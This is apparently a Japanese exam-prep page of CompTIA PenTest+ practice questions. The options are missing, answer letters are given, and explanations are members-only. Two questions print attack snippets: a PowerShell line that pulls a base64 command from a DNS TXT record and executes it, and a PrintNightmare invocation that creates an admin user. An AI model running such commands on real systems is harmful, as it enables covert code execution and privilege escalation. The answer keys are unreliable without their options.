PT0-003 無料問題集「CompTIA PenTest+」
A penetration tester writes the following script, which is designed to hide communication and bypass some restrictions on a client's network:
$base64cmd = Resolve-DnsName foo.comptia.org -Type TXT | Select-Object
-ExpandProperty Strings $decodecmd =
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Stri ng($base64cmd)) Powershell -C $decodecmd Which of the following best describes the technique the tester is applying?
$base64cmd = Resolve-DnsName foo.comptia.org -Type TXT | Select-Object
-ExpandProperty Strings $decodecmd =
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Stri ng($base64cmd)) Powershell -C $decodecmd Which of the following best describes the technique the tester is applying?
正解:C
解答を投票する
解説: (JPNTest メンバーにのみ表示されます)
During an assessment, a penetration tester manages to get RDP access via a low-privilege user.
The tester attempts to escalate privileges by running the following commands:
Import-Module .\PrintNightmare.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -
DriverName "Print"
The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low. Which of the following actions should the penetration tester take next?
The tester attempts to escalate privileges by running the following commands:
Import-Module .\PrintNightmare.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -
DriverName "Print"
The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low. Which of the following actions should the penetration tester take next?
正解:A
解答を投票する
解説: (JPNTest メンバーにのみ表示されます)
During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server's input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?
正解:C
解答を投票する
解説: (JPNTest メンバーにのみ表示されます)
A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?
正解:D
解答を投票する
解説: (JPNTest メンバーにのみ表示されます)
A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?
正解:D
解答を投票する
解説: (JPNTest メンバーにのみ表示されます)
